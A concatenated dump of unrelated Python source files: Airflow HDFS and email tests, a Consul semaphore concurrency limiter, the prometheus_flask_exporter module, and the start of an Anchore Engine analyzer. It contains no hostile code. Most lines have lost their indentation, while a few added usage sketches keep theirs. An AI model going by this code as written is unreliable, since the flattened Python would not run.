from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
concurrency_limiter.py
|
import json
import logging
import threading
import consul
import os
from time import sleep, time
from contextlib import contextmanager
__author__ = 'quatrix'
@contextmanager
def ConcurrencyLimiterContext(name, limit, ttl=30, blocking=True, timeout=None):
c = ConcurrencyLimiter(name, limit, ttl)
try:
c.acquire(blocking, timeout)
yield
finally:
c.release()
class SemaphoreNodes(object):
def __init__(self, nodes, limit, lock_key, session_id):
self.nodes = nodes
self._limit = limit
self.lock_key = lock_key
self.session_id = session_id
@property
def contender_keys(self):
return set([v['Session'] for v in self.nodes if v['Key'] != self.lock_key])
@property
def lock_node(self):
try:
return [v for v in self.nodes if v['Key'] == self.lock_key][0]
except (TypeError, IndexError):
return None
@property
def semaphore(self):
if self.lock_node is None:
return None
semaphore = json.loads(self.lock_node['Value'])
semaphore['Holders'] = [holder for holder in semaphore['Holders'] if holder in self.contender_keys]
return semaphore
def get_modify_index(self):
if self.lock_node is None:
return 0
return self.lock_node['ModifyIndex']
@property
def holders(self):
if self.semaphore is None:
return []
return self.semaphore['Holders']
@property
def limit(self):
if self.semaphore is None:
return self._limit
return self.semaphore['Limit']
def create_new_lock_node(self):
return {
'Limit': self.limit,
'Holders': self.holders + [self.session_id]
}
def can_get_lock(self):
return len(self.holders) < self.limit
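# Illustrative sketch (not part of the original module): how SemaphoreNodes
# interprets the raw KV nodes returned by consul.kv.get(prefix, recurse=True).
# The node dicts below are hypothetical examples; only the fields used above
# ('Key', 'Session', 'Value', 'ModifyIndex') are filled in.
def _semaphore_nodes_example():
    prefix = 'service/demo/lock/'
    lock_key = prefix + '.lock'
    nodes = [
        # one contender key per session holding (or waiting for) the semaphore
        {'Key': prefix + 'session-a', 'Session': 'session-a', 'Value': b'demo', 'ModifyIndex': 10},
        {'Key': prefix + 'session-b', 'Session': 'session-b', 'Value': b'demo', 'ModifyIndex': 11},
        # the shared lock node storing the semaphore state as JSON
        {'Key': lock_key, 'Session': None, 'ModifyIndex': 12,
         'Value': json.dumps({'Limit': 2, 'Holders': ['session-a']})},
    ]
    sn = SemaphoreNodes(nodes=nodes, limit=2, lock_key=lock_key, session_id='session-b')
    # holders are filtered down to sessions that still have a contender key
    assert sn.holders == ['session-a']
    assert sn.can_get_lock()  # 1 holder < limit of 2
    return sn.create_new_lock_node()  # {'Limit': 2, 'Holders': ['session-a', 'session-b']}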
class ConcurrencyLimiter(object):
def __init__(self, name, limit, ttl=30):
self.name = name
self.limit = limit
self.ttl = ttl
consul_host = os.environ.get('CONSUL_HOST', '127.0.0.1')
consul_port = int(os.environ.get('CONSUL_PORT', '8500'))
logging.info('using consul host: %s port: %d', consul_host, consul_port)
self.consul = consul.Consul(host=consul_host, port=consul_port)
self.prefix_key = 'service/{name}/lock/'.format(name=self.name)
self.lock_key = '{prefix}.lock'.format(prefix=self.prefix_key)
def get_session_id(self):
if not hasattr(self, '_session'):
self._session = self.consul.session.create(name=self.name, ttl=self.ttl, behavior='delete')
return self._session
def create_contender_key(self):
return self.consul.kv.put(
'{prefix}{session}'.format(
prefix=self.prefix_key,
session=self.get_session_id()
),
self.name,
acquire=self.get_session_id()
)
def get_semaphore_nodes(self):
return SemaphoreNodes(
nodes=self.consul.kv.get(self.prefix_key, recurse=True)[1],
limit=self.limit,
lock_key=self.lock_key,
session_id=self.get_session_id(),
)
def create_lock_node(self, lock_node, modify_index):
return self.consul.kv.put(
key=self.lock_key,
value=json.dumps(lock_node),
cas=modify_index,
)
def get_lock(self):
semaphore_nodes = self.get_semaphore_nodes()
if not semaphore_nodes.can_get_lock():
return False
return self.create_lock_node(
lock_node=semaphore_nodes.create_new_lock_node(),
modify_index=semaphore_nodes.get_modify_index(),
)
def keep_alive(self):
last_renew_time = time()
while not self._stop_keep_alive.wait(timeout=0.1):
if time() - last_renew_time > (self.ttl - 5):
self.consul.session.renew(self.get_session_id())
last_renew_time = time()
def start_keep_alive(self):
self.keep_alive_thread = threading.Thread(target=self.keep_alive)
self.keep_alive_thread.daemon = True
self._stop_keep_alive = threading.Event()
self.keep_alive_thread.start()
def stop_keep_alive(self):
logging.info('setting stop keep alive')
self._stop_keep_alive.set()
self.keep_alive_thread.join()
def acquire(self, blocking=True, timeout=None):
logging.info('trying to get lock for %s (limit=%d)', self.name, self.limit)
if not self.create_contender_key():
raise RuntimeError('can\'t create contender_key')
if blocking:
self.start_keep_alive()
t0 = time()
while not self.get_lock():
if timeout is not None and time() - t0 > timeout:
raise RuntimeError('timeout while trying to get lock')
logging.info('trying to get lock')
sleep(1)
else:
logging.info('trying to get lock')
if not self.get_lock():
raise RuntimeError('can\'t get lock')
self.start_keep_alive()
logging.info('got lock')
def release(self):
logging.info('releasing lock')
self.stop_keep_alive()
self.consul.session.destroy(self.get_session_id())
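# Minimal usage sketch (not part of the original module), assuming a Consul
# agent is reachable at CONSUL_HOST/CONSUL_PORT (default 127.0.0.1:8500).
# The semaphore name 'nightly-report' is just an example. At most `limit`
# processes across the cluster enter the guarded block at once; the session
# TTL is kept alive in the background and the lock is released on exit.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    with ConcurrencyLimiterContext(name='nightly-report', limit=3, ttl=30, blocking=True, timeout=120):
        # do the work that must not run on more than 3 nodes concurrently
        sleep(5)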
|
__init__.py
|
import os
import re
import sys
import inspect
import warnings
import functools
import threading
from http import HTTPStatus
from timeit import default_timer
from flask import request, make_response, current_app
from flask import Flask, Response
from flask.views import MethodViewType
from werkzeug.serving import is_running_from_reloader
from prometheus_client import Counter, Histogram, Gauge, Summary
from prometheus_client import generate_latest, CONTENT_TYPE_LATEST
if sys.version_info[0:2] >= (3, 4):
    # Python 3.4+ already provides the __wrapped__ attribute via functools.wraps
wraps = functools.wraps
else:
    # on earlier Python versions we have to set the missing attribute ourselves
def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
def wrapper(f):
f = functools.wraps(wrapped, assigned, updated)(f)
f.__wrapped__ = wrapped
return f
return wrapper
NO_PREFIX = '#no_prefix'
"""
Constant indicating that default metrics should not have any prefix applied.
It deliberately uses characters that are invalid in metric names, as specified in the Prometheus
documentation (see: https://prometheus.io/docs/concepts/data_model/#metric-names-and-labels)
"""
class PrometheusMetrics(object):
"""
Prometheus metrics export configuration for Flask.
The default metrics include a Histogram for HTTP request latencies
and number of HTTP requests plus a Counter for the total number
of HTTP requests.
Sample usage:
app = Flask(__name__)
metrics = PrometheusMetrics(app)
# static information as metric
metrics.info('app_info', 'Application info', version='1.0.3')
@app.route('/')
def main():
pass # requests tracked by default
@app.route('/skip')
@metrics.do_not_track()
def skip():
pass # default metrics are not collected
@app.route('/<item_type>')
@metrics.do_not_track()
@metrics.counter('invocation_by_type', 'Number of invocations by type',
                 labels={'item_type': lambda: request.view_args['item_type']})
def by_type(item_type):
pass # only the counter is collected, not the default metrics
@app.route('/long-running')
@metrics.gauge('in_progress', 'Long running requests in progress')
def long_running():
pass
@app.route('/status/<int:status>')
@metrics.do_not_track()
@metrics.summary('requests_by_status', 'Request latencies by status',
labels={'status': lambda r: r.status_code})
@metrics.histogram('requests_by_status_and_path', 'Request latencies by status and path',
labels={'status': lambda r: r.status_code, 'path': lambda: request.path})
def echo_status(status):
return 'Status: %s' % status, status
Label values can be defined as callables:
- With a single argument that will be the Flask Response object
- Without an argument, possibly to use with the Flask `request` object
"""
def __init__(self, app, path='/metrics',
export_defaults=True, defaults_prefix='flask',
group_by='path', buckets=None, static_labels=None,
excluded_paths=None, registry=None, **kwargs):
"""
Create a new Prometheus metrics export configuration.
:param app: the Flask application
:param path: the metrics path (defaults to `/metrics`)
:param export_defaults: expose all HTTP request latencies
and number of HTTP requests
:param defaults_prefix: string to prefix the default exported
metrics name with (when either `export_defaults=True` or
`export_defaults(..)` is called) or in case you don't want
any prefix then use `NO_PREFIX` constant
:param group_by: group default HTTP metrics by
this request property, like `path`, `endpoint`, `url_rule`, etc.
(defaults to `path`)
:param buckets: the time buckets for request latencies
(will use the default when `None`)
:param static_labels: static labels to attach to each of the
metrics exposed by this `PrometheusMetrics` instance
:param excluded_paths: regular expression(s) as a string or
a list of strings for paths to exclude from tracking
:param registry: the Prometheus Registry to use
"""
self.app = app
self.path = path
self._export_defaults = export_defaults
self._defaults_prefix = defaults_prefix or 'flask'
self._static_labels = static_labels or {}
self.buckets = buckets
self.version = __version__
if registry:
self.registry = registry
else:
# load the default registry from the underlying
# Prometheus library here for easier unit testing
# see https://github.com/rycus86/prometheus_flask_exporter/pull/20
from prometheus_client import REGISTRY as DEFAULT_REGISTRY
self.registry = DEFAULT_REGISTRY
if kwargs.get('group_by_endpoint') is True:
warnings.warn(
'The `group_by_endpoint` argument of `PrometheusMetrics` is '
'deprecated since 0.4.0, please use the '
'new `group_by` argument.', DeprecationWarning
)
self.group_by = 'endpoint'
elif group_by:
self.group_by = group_by
else:
self.group_by = 'path'
if excluded_paths:
if PrometheusMetrics._is_string(excluded_paths):
excluded_paths = [excluded_paths]
self.excluded_paths = [
re.compile(p) for p in excluded_paths
]
else:
self.excluded_paths = None
if app is not None:
self.init_app(app)
def init_app(self, app):
"""
This callback can be used to initialize an application for the
use with this prometheus reporter setup.
This is usually used with a flask "app factory" configuration. Please
see: http://flask.pocoo.org/docs/1.0/patterns/appfactories/
        Note that you need to use `PrometheusMetrics(app=None, ...)`
        for this mode; otherwise `init_app` is called automatically.
:param app: the Flask application
"""
if self.path:
self.register_endpoint(self.path, app)
if self._export_defaults:
self.export_defaults(
self.buckets, self.group_by,
self._defaults_prefix, app
)
def register_endpoint(self, path, app=None):
"""
Register the metrics endpoint on the Flask application.
:param path: the path of the endpoint
:param app: the Flask application to register the endpoint on
(by default it is the application registered with this class)
"""
if is_running_from_reloader() and not os.environ.get('DEBUG_METRICS'):
return
if app is None:
app = self.app or current_app
@app.route(path)
@self.do_not_track()
def prometheus_metrics():
# import these here so they don't clash with our own multiprocess module
from prometheus_client import multiprocess, CollectorRegistry
if 'prometheus_multiproc_dir' in os.environ:
registry = CollectorRegistry()
else:
registry = self.registry
if 'name[]' in request.args:
registry = registry.restricted_registry(request.args.getlist('name[]'))
if 'prometheus_multiproc_dir' in os.environ:
multiprocess.MultiProcessCollector(registry)
headers = {'Content-Type': CONTENT_TYPE_LATEST}
return generate_latest(registry), 200, headers
def start_http_server(self, port, host='0.0.0.0', endpoint='/metrics'):
"""
Start an HTTP server for exposing the metrics.
This will be an individual Flask application,
not the one registered with this class.
:param port: the HTTP port to expose the metrics endpoint on
:param host: the HTTP host to listen on (default: `0.0.0.0`)
:param endpoint: the URL path to expose the endpoint on
(default: `/metrics`)
"""
if is_running_from_reloader():
return
app = Flask('prometheus-flask-exporter-%d' % port)
self.register_endpoint(endpoint, app)
def run_app():
app.run(host=host, port=port)
thread = threading.Thread(target=run_app)
        thread.daemon = True
thread.start()
def export_defaults(self, buckets=None, group_by='path',
prefix='flask', app=None, **kwargs):
"""
Export the default metrics:
- HTTP request latencies
- Number of HTTP requests
:param buckets: the time buckets for request latencies
(will use the default when `None`)
:param group_by: group default HTTP metrics by
this request property, like `path`, `endpoint`, `rule`, etc.
(defaults to `path`)
:param prefix: prefix to start the default metrics names with
or `NO_PREFIX` (to skip prefix)
:param app: the Flask application
"""
if app is None:
app = self.app or current_app
if not prefix:
prefix = self._defaults_prefix or 'flask'
# use the default buckets from prometheus_client if not given here
buckets_as_kwargs = {}
if buckets is not None:
buckets_as_kwargs['buckets'] = buckets
if kwargs.get('group_by_endpoint') is True:
warnings.warn(
'The `group_by_endpoint` argument of '
'`PrometheusMetrics.export_defaults` is deprecated since 0.4.0, '
'please use the new `group_by` argument.', DeprecationWarning
)
duration_group = 'endpoint'
elif group_by:
duration_group = group_by
else:
duration_group = 'path'
if callable(duration_group):
duration_group_name = duration_group.__name__
else:
duration_group_name = duration_group
if prefix == NO_PREFIX:
prefix = ""
else:
prefix = prefix + "_"
additional_labels = self._static_labels.items()
histogram = Histogram(
'%shttp_request_duration_seconds' % prefix,
'Flask HTTP request duration in seconds',
('method', duration_group_name, 'status') + tuple(map(lambda kv: kv[0], additional_labels)),
registry=self.registry,
**buckets_as_kwargs
)
counter = Counter(
'%shttp_request_total' % prefix,
'Total number of HTTP requests',
('method', 'status') + tuple(map(lambda kv: kv[0], additional_labels)),
registry=self.registry
)
self.info(
'%sexporter_info' % prefix,
'Information about the Prometheus Flask exporter',
version=self.version, **self._static_labels
)
def before_request():
request.prom_start_time = default_timer()
def after_request(response):
if hasattr(request, 'prom_do_not_track') or hasattr(request, 'prom_exclude_all'):
return response
if self.excluded_paths:
if any(pattern.match(request.path) for pattern in self.excluded_paths):
return response
if isinstance(response.status_code, HTTPStatus):
status_code = response.status_code.value
else:
status_code = response.status_code
if hasattr(request, 'prom_start_time'):
total_time = max(default_timer() - request.prom_start_time, 0)
if callable(duration_group):
group = duration_group(request)
else:
group = getattr(request, duration_group)
histogram.labels(
request.method, group, status_code,
*map(lambda kv: kv[1], additional_labels)
).observe(total_time)
counter.labels(
request.method, status_code,
*map(lambda kv: kv[1], additional_labels)
).inc()
return response
def teardown_request(exception=None):
if not exception or hasattr(request, 'prom_do_not_track') or hasattr(request, 'prom_exclude_all'):
return
if self.excluded_paths:
if any(pattern.match(request.path) for pattern in self.excluded_paths):
return
if hasattr(request, 'prom_start_time'):
total_time = max(default_timer() - request.prom_start_time, 0)
if callable(duration_group):
group = duration_group(request)
else:
group = getattr(request, duration_group)
histogram.labels(
request.method, group, 500,
*map(lambda kv: kv[1], additional_labels)
).observe(total_time)
counter.labels(
request.method, 500,
*map(lambda kv: kv[1], additional_labels)
).inc()
return
app.before_request(before_request)
app.after_request(after_request)
app.teardown_request(teardown_request)
def register_default(self, *metric_wrappers, **kwargs):
"""
Registers metric wrappers to track all endpoints,
similar to `export_defaults` but with user defined metrics.
Call this function after all routes have been set up.
Use the metric wrappers as arguments:
- metrics.counter(..)
- metrics.gauge(..)
- metrics.summary(..)
- metrics.histogram(..)
:param metric_wrappers: one or more metric wrappers to register
for all available endpoints
:param app: the Flask application to register the default metric for
(by default it is the application registered with this class)
"""
app = kwargs.get('app')
if app is None:
app = self.app or current_app
for endpoint, view_func in app.view_functions.items():
for wrapper in metric_wrappers:
view_func = wrapper(view_func)
app.view_functions[endpoint] = view_func
def histogram(self, name, description, labels=None, **kwargs):
"""
Use a Histogram to track the execution time and invocation count
of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Histogram
"""
return self._track(
Histogram,
lambda metric, time: metric.observe(time),
kwargs, name, description, labels,
registry=self.registry
)
def summary(self, name, description, labels=None, **kwargs):
"""
Use a Summary to track the execution time and invocation count
of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Summary
"""
return self._track(
Summary,
lambda metric, time: metric.observe(time),
kwargs, name, description, labels,
registry=self.registry
)
def gauge(self, name, description, labels=None, **kwargs):
"""
Use a Gauge to track the number of invocations in progress
for the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Gauge
"""
return self._track(
Gauge,
lambda metric, time: metric.dec(),
kwargs, name, description, labels,
registry=self.registry,
before=lambda metric: metric.inc(),
revert_when_not_tracked=lambda metric: metric.dec()
)
def counter(self, name, description, labels=None, **kwargs):
"""
Use a Counter to track the total number of invocations of the method.
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param kwargs: additional keyword arguments for creating the Counter
"""
return self._track(
Counter,
lambda metric, time: metric.inc(),
kwargs, name, description, labels,
registry=self.registry
)
def _track(self, metric_type, metric_call, metric_kwargs, name, description, labels,
registry, before=None, revert_when_not_tracked=None):
"""
Internal method decorator logic.
:param metric_type: the type of the metric from the `prometheus_client` library
:param metric_call: the invocation to execute as a callable with `(metric, time)`
:param metric_kwargs: additional keyword arguments for creating the metric
:param name: the name of the metric
:param description: the description of the metric
:param labels: a dictionary of `{labelname: callable_or_value}` for labels
:param registry: the Prometheus Registry to use
:param before: an optional callable to invoke before executing the
request handler method accepting the single `metric` argument
:param revert_when_not_tracked: an optional callable to invoke when
a non-tracked endpoint is being handled to undo any actions already
done on it, accepts a single `metric` argument
"""
if labels is not None and not isinstance(labels, dict):
raise TypeError('labels needs to be a dictionary of {labelname: callable}')
if self._static_labels:
if not labels:
labels = self._static_labels
else:
# merge the default labels and the specific ones for this metric
combined = dict()
combined.update(self._static_labels)
combined.update(labels)
labels = combined
label_names = labels.keys() if labels else tuple()
parent_metric = metric_type(
name, description, labelnames=label_names, registry=registry,
**metric_kwargs
)
def argspec(func):
if hasattr(inspect, 'getfullargspec'):
return inspect.getfullargspec(func)
else:
return inspect.getargspec(func)
def label_value(f):
if not callable(f):
return lambda x: f
if argspec(f).args:
return lambda x: f(x)
else:
return lambda x: f()
label_generator = tuple(
(key, label_value(call))
for key, call in labels.items()
) if labels else tuple()
def get_metric(response):
if label_names:
return parent_metric.labels(
**{key: call(response) for key, call in label_generator}
)
else:
return parent_metric
def decorator(f):
@wraps(f)
def func(*args, **kwargs):
if before:
metric = get_metric(None)
before(metric)
else:
metric = None
exception = None
start_time = default_timer()
try:
try:
# execute the handler function
response = f(*args, **kwargs)
except Exception as ex:
# let Flask decide to wrap or reraise the Exception
response = current_app.handle_user_exception(ex)
except Exception as ex:
# if it was re-raised, treat it as an InternalServerError
exception = ex
response = make_response('Exception: %s' % ex, 500)
if hasattr(request, 'prom_exclude_all'):
if metric and revert_when_not_tracked:
# special handling for Gauge metrics
revert_when_not_tracked(metric)
return response
total_time = max(default_timer() - start_time, 0)
if not metric:
if not isinstance(response, Response) and request.endpoint:
view_func = current_app.view_functions[request.endpoint]
# There may be decorators 'above' us,
# but before the function is registered with Flask
while view_func and view_func != f:
try:
view_func = view_func.__wrapped__
except AttributeError:
break
if view_func == f:
# we are in a request handler method
response = make_response(response)
elif hasattr(view_func, 'view_class') and isinstance(view_func.view_class, MethodViewType):
# we are in a method view (for Flask-RESTful for example)
response = make_response(response)
metric = get_metric(response)
metric_call(metric, time=total_time)
if exception:
try:
# re-raise for the Flask error handler
raise exception
except Exception as ex:
return current_app.handle_user_exception(ex)
else:
return response
return func
return decorator
@staticmethod
def do_not_track():
"""
Decorator to skip the default metrics collection for the method.
*Note*: explicit metrics decorators will still collect the data
"""
def decorator(f):
@wraps(f)
def func(*args, **kwargs):
request.prom_do_not_track = True
return f(*args, **kwargs)
return func
return decorator
@staticmethod
def exclude_all_metrics():
"""
Decorator to skip all metrics collection for the method.
"""
def decorator(f):
@wraps(f)
def func(*args, **kwargs):
request.prom_exclude_all = True
return f(*args, **kwargs)
return func
return decorator
def info(self, name, description, labelnames=None, labelvalues=None, **labels):
"""
Report any information as a Prometheus metric.
This will create a `Gauge` with the initial value of 1.
The easiest way to use it is:
metrics = PrometheusMetrics(app)
metrics.info(
'app_info', 'Application info',
version='1.0', major=1, minor=0
)
If the order of the labels matters:
metrics = PrometheusMetrics(app)
metrics.info(
'app_info', 'Application info',
('version', 'major', 'minor'),
('1.0', 1, 0)
)
:param name: the name of the metric
:param description: the description of the metric
:param labelnames: the names of the labels
:param labelvalues: the values of the labels
:param labels: the names and values of the labels
:return: the newly created `Gauge` metric
"""
if labels and labelnames:
raise ValueError(
'Cannot have labels defined as `dict` '
'and collections of names and values'
)
if labelnames is None and labels:
labelnames = labels.keys()
elif labelnames and labelvalues:
for idx, label_name in enumerate(labelnames):
labels[label_name] = labelvalues[idx]
gauge = Gauge(
name, description, labelnames or tuple(),
registry=self.registry
)
if labels:
gauge = gauge.labels(**labels)
gauge.set(1)
return gauge
@staticmethod
def _is_string(value):
try:
return isinstance(value, basestring) # python2
except NameError:
return isinstance(value, str) # python3
__version__ = '0.13.0'
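# Minimal usage sketch (not part of the original module): wiring the exporter
# into a small Flask app. The route, metric names and label values are made up
# for illustration; the defaults expose request metrics at /metrics.
if __name__ == '__main__':
    demo_app = Flask(__name__)
    demo_metrics = PrometheusMetrics(demo_app, defaults_prefix='demo',
                                     static_labels={'service': 'demo'})
    demo_metrics.info('demo_app_info', 'Demo application info', version=__version__)

    @demo_app.route('/ping')
    @demo_metrics.counter('demo_ping_total', 'Number of /ping calls')
    def ping():
        return 'pong'

    demo_app.run(host='127.0.0.1', port=5000)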
|
__init__.py
|
import copy
import os
import threading
import time
import json
import operator
import pkg_resources
# anchore modules
import anchore_engine.clients.localanchore_standalone
import anchore_engine.common.helpers
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services.simplequeue import SimpleQueueClient
from anchore_engine.clients.services.catalog import CatalogClient
from anchore_engine.clients.services.policy_engine import PolicyEngineClient
from anchore_engine.clients import localanchore_standalone
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
import anchore_engine.subsys.metrics
import anchore_engine.common
import anchore_engine.subsys.taskstate
import anchore_engine.subsys.notifications
from anchore_engine.subsys import logger
from anchore_engine.utils import AnchoreException
import anchore_engine.subsys.events as events
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.service import ApiService
from anchore_engine.db import session_scope
############################################
queuename = "images_to_analyze"
system_user_auth = ('anchore-system', '')
#current_avg = 0.0
#current_avg_count = 0.0
def perform_analyze(userId, manifest, image_record, registry_creds, layer_cache_enable=False):
return perform_analyze_nodocker(userId, manifest, image_record, registry_creds, layer_cache_enable=layer_cache_enable)
def perform_analyze_nodocker(userId, manifest, image_record, registry_creds, layer_cache_enable=False):
ret_analyze = {}
ret_query = {}
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
except Exception as err:
logger.warn("could not get tmp_dir from localconfig - exception: " + str(err))
tmpdir = "/tmp"
use_cache_dir=None
if layer_cache_enable:
use_cache_dir = os.path.join(tmpdir, "anchore_layercache")
    # choose the first image detail; TODO: possibly use a more complex selection here
try:
image_detail = image_record['image_detail'][0]
registry_manifest = manifest
pullstring = image_detail['registry'] + "/" + image_detail['repo'] + "@" + image_detail['imageDigest']
fulltag = image_detail['registry'] + "/" + image_detail['repo'] + ":" + image_detail['tag']
logger.debug("using pullstring ("+str(pullstring)+") and fulltag ("+str(fulltag)+") to pull image data")
except Exception as err:
image_detail = pullstring = fulltag = None
raise Exception("failed to extract requisite information from image_record - exception: " + str(err))
timer = int(time.time())
